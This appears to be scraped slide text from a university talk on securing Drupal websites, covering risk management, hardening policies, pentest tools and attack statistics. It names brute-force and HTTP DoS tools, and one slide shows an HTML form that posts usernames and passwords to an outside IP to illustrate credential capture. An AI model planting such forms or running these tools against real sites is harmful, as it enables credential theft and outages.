Upload
others
View
1
Download
0
Embed Size (px)
Citation preview
One Drupal In the Bucket:Keeping Web Infrastructure Safe from the Flood
Eric Samboy
Hayden Bacon
2
The day I came to the USA
3
Beautiful Country
4
Ready for crossing the street?
5
Quick Warmup
6
Website Hacking Statistics
• 1.86 billion websites on the internet.
[0] https://www.securityweek.com/185-million-websites-infected-malware-any-time
[1] https://www.webarxsecurity.com/website-hacking-statistics-2018-february/
• 1% of these websites are known to be infected.
7
How does SASG use Drupal?
• About 100 Drupal UA websites.
• UA Quickstart & UA Zen
8
How big is Drupal?
• One of the largest open source communities in the world.
• Used by more than 1 million sites on the internet.
• 800 thousand Drupal 7.x
• 225 thousand Drupal 8.x
9
Security Concerns
• Greater risk of being attacked.
• More vulnerabilities are discovered and exploited
• How do we keep our web infrastructure safe?
https://www.keycdn.com/blog/drupal-security
10
Outline
• Our Drupal Security Policies• Drupal Modules
• Drupal Core
• Access Control
• Security Awareness
• UA Cybersecurity Framework• Risk Management & Analysis
• Security Best Practices
11
Our Drupal Security Policies
• Keep Drupal and Modules updated
• Access Control
• Security Awareness
• Contributed Modules Installation
12
Our Drupal Security Policies
Contributed Modules Installation
13
Risk Management
• Guidance to mitigate cyber risks
National Institute of Standards and Technology (NIST) Framework
• Best practice
• Business continuity plan
https://confluence.arizona.edu/display/UAIS/UA+Cybersecurity+Framework+and+Risk+Assessment
14
Risk Management
• Asset Management
• Business Environment
• Governance
• Risk Assessment
• Risk Management Strategy
15
Risk Management
• Access Control
• Awareness & Training
• Data Security
• Policies & Procedures
• Maintenance
• Protective Technology
16
Risk Management
• Anomalies & Events
• Continuous Monitoring
• Detection Processes
17
Risk Management
• Response Planning
• Communications
• Analysis
• Mitigation
• Improvements
18
Risk Management
• Recovery Planning
• Improvements
• Communications
Conclusion
19
What to take away.
• Doors are only as secure as their locks.
• We all have the responsibility to follow best practice.
And now…
20
Hayden will cover:
• Drupal Penetration Testing
• More Security Policies
• Drupal statistics
• Being afraid, but not too afraid
Drupal Penetration Testing
21
1. What do we look for?
2. What tools do we use?
Drupal Penetration Testing
22
What to look for• HTTP or HTTPS
• Drupal version
• PHP version
• Apache version
• OS version
• Reverse Proxies
• Custom Modules
• Passwords
Drupal Penetration Testing
23
Drupwn
What tools we use
Enumeration tool:
• User enumeration
• Node enumeration
• Default files enumeration
• Module enumeration
• Theme enumeration
• Cookies support
• User-Agent support
• Basic authentication
support
• Request delay
• Enumeration range
• Logging
• Socks and HTTP proxy
support
Drupal Penetration Testing
24
Drupwn
What tools we use
Drupal Penetration Testing
25
X Brute Forcer
What tools we use
Brute force passwords for:
• WordPress
• Joomla
• Drupal
• OpenCart
• Magento
Drupal Penetration Testing
26
What tools we useX Brute Forcer
Drupal Penetration Testing
27
What tools we useX Brute Forcer
Drupal Penetration Testing
28
What tools we useX Brute Forcer
Drupal Penetration Testing
29
Switchblade HTTP DoS Tool
What tools we use
Drupal Penetration Testing
30
OWASP Switchblade
What tools we use
Drupal Penetration Testing
31
OWASP Switchblade
What tools we use
32
More Drupal Security Policies
• Serve over HTTPS
• File permissions
• Secure connections
• Database Security
• Hardened HTTPS Security
• Drupal Security Modules
33
More Drupal Security Policies
Why serve over HTTPS?
34
More Drupal Security Policies
Why serve over HTTPS?
“All websites should use HTTPS, even
if they don't include private content,
sign-in pages, or credit card details.”- UK National Cyber Security Centre
[0] https://www.ncsc.gov.uk/blog-post/serve-websites-over-https-always
35
More Drupal Security Policies
Why serve over HTTPS?
[0] https://www.ncsc.gov.uk/blog-post/serve-websites-over-https-always
36
More Drupal Security Policies
Why serve over HTTPS?
<form action=“http://34.218.2.81/notyourform” method=“POST”>
<input name=“username” value=“username”>
<input name=“password” value=“password”>
</form>
37
More Drupal Security Policies
Why serve over HTTPS?<!-- Google Analytics -->
<script>
(function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){
(i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o),
m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m)
})(window,document,'script','https://www.google-analytics.com/analytics.js','ga');
ga('create', 'UA-XXXXX-Y', 'auto');
ga('send', 'pageview');
</script>
<!-- End Google Analytics -->
38
More Drupal Security Policies
Why serve over HTTPS?
39
More Drupal Security Policies
Use only secure connections:
40
More Drupal Security Policies
Use only secure connections:
41
More Drupal Security Policies
Databases:
42
More Drupal Security Policies
Database Best Practices:
• Use different database credentials between environments.
• Use a longer random password, which should not contain
special characters, except : @ . , / + - ! =
• Use a random table name prefix.
43
More Drupal Security Policies
HTTP Strict-Transport-Security:
44
More Drupal Security Policies
Public Key Pinning:
45
More Drupal Security Policies
These modules can help you:
• Login Security: Limit number of login attempts and deny access by IP address.
• ACL: Access control lists for access to nodes.
• Password policy: Define more security password policies for users.
• Captcha: Block form submissions from spambots/scripts.
• Automated Logout: Allows administrator ability to log out users after specified time period.
• Session Limit: Limit the number of simultaneous sessions per user.
• Content Access: Permissions for content types by role and author.
• Coder: Checks your Drupal code against coding standard and best practices.
• SpamSpan filter: Obfuscates email address to help prevent spambots from collecting them.
• Hacked!: Check to see if there have been changes to Drupal core or themes.
46
326 Vulnerabilities Reported
47
326 Vulnerabilities Reported
[0] https://www.cvedetails.com/vendor/1367/Drupal.html
48
328 Vulnerabilities Reported
[0] https://www.cvedetails.com/vendor/1367/Drupal.html
What are attackers using?
49[0] https://sucuri.net/reports/Sucuri-Hacked-Report-2017.pdf
What are attackers using?
50
Backdoor: Artifacts used to re-infect or retain
access.
What are attackers using?
51
Backdoor: Artifacts used to re-infect or retain
access.
Malware: Generic browser-side code to trigger
malware downloads.
What are attackers using?
52
Backdoor: Artifacts used to re-infect or retain
access.
Malware: Generic browser-side code to trigger
malware downloads.
SEO Spam: Create dummy content with
backlinks to another website, to boost SEO.
What are attackers using?
53
Mailer: Abuse server resources to send spam
email.
What are attackers using?
54
Mailer: Abuse server resources to send spam
email.
Phishing: Attempts to trick users into sharing
sensitive information.
55
Drupal is Lucky
[0] https://sucuri.net/reports/Sucuri-Hacked-Report-2017.pdf
56
% of top 10M websites CMS Market Share
[0] https://w3techs.com/technologies/overview/content_management/all
Drupal is Lucky
57
Drupal is Lucky
[1] https://sucuri.net/reports/Sucuri-Hacked-Report-2017.pdf[0] https://w3techs.com/technologies/overview/content_management/all
58
Drupal is Lucky1. Alex Bronstein (effulgentsia) - IRC nick: effulgentsia, Organization: Acquia
2. Alex Pott (alexpott) - IRC nick: alexpott, Organization: Acro Media, Thunder
3. Angie Byron (w ebchick) - IRC nick: w ebchick, Organization: Acquia
4. Ben Dougherty (benjy) - IRC nick: benjy, Organization: PreviousNext
5. Ben Jeavons (coltrane) - IRC nick: coltrane, Organization: CARD.com6. Cash Williams (cashwilliams) - IRC nick: CashWilliams, Organization: Acquia
7. Cathy Theys (YesCT) - IRC nick: YesCT, Organization: BlackMesh
8. Chris McCafferty (cilefen) - IRC nick: cilefen, Organization: Institute for Advanced Study
9. Damien McKenna (DamienMcKenna) - IRC nick: dmckenna, Organization: Mediacurrent
10. Dan Smith (galooph) - IRC nick: galooph, Organization: Code Enigma11. Dave Reid (Dave Reid) - IRC nick: davereid, Organization: Lullabot
12. David Rothstein (David_Rothstein) - IRC nick: David_Rothstein, Organization:
13. David Snopek (dsnopek) - IRC nick: dsnopek, Organization: myDropWizard
14. David Stoline (dstol) - IRC nick: dstol, Organization: Acquia
15. David Strauss (David Strauss) - IRC nick: davidstrauss, Organization: GetPantheon16. Dries Buytaert (Dries) - IRC nick: Dries__, Organization: Acquia
17. Gerhard Killesreiter ([email protected]) - IRC nick: killes, Organization:
18. Greg Knaddison (greggles) - IRC nick: greggles, Organization: CARD.com
19. Heine Deelstra (Heine) - IRC nick: Heine, Organization: LimoenGroen
20. Ivo Van Geertruyen (mr.baileys) - IRC nick: mrbaileys, Organization: Calibrate21. James Gilliland (neclimdul) - IRC nick: neclimdul, Organization: APQC
22. Lee Row lands (larowlan) - IRC nick: larow lan, Organization: PreviousNext
23. Michael Hess (mlhess) - IRC nick: digiv, Organization: University of Michigan
24. Mike Potter (mpotter) - IRC nick: mpotter, Organization: Phase2
25. Mori Sugimoto (dokumori) - IRC nick: dokumori, Organization: Share & Thrive26. Moshe Weitzman (moshe w eitzman) - IRC nick: moshe_w ork, Organization:
27. Nathaniel Catchpole (catch) - IRC nick: catch, Organization: Tag1 Consulting
28. Neil Drumm (drumm) - IRC nick: drumm, Organization: Drupal Association
29. Peter Wolanin (pw olanin) - IRC nick: pw olanin, Organization: BioRAFT
30. Stefan Ruijsenaars (stefan.r) - IRC nick: stefan_r, Organization: Ruijsenaars Development31. Stella Pow er (stella) - IRC nick: stella, Organization: Annertech
32. xjm (xjm) - IRC nick: xjm, Organization: Acquia
59
In Conclusion